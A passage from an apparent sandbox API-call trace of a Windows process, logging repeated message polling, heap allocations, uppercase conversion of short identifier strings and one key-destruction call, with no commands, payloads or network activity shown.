PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.787] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.787] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.787] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.788] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.788] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.788] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.788] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.788] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.788] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.788] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.789] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.789] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.789] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.789] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.789] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.789] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.790] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.791] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.791] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.792] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.792] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.792] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.792] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.792] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.793] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.793] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.793] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.794] CryptDestroyKey (hKey=0xaa5960) returned 1 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.794] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.794] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.794] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.794] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.795] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.795] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.795] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.795] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.795] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.795] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.795] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.795] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.796] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.796] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.796] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.796] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.796] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.796] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.796] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.797] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.797] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.797] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.797] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.798] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.798] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.798] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.798] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.799] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.799] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.799] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.799] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.799] 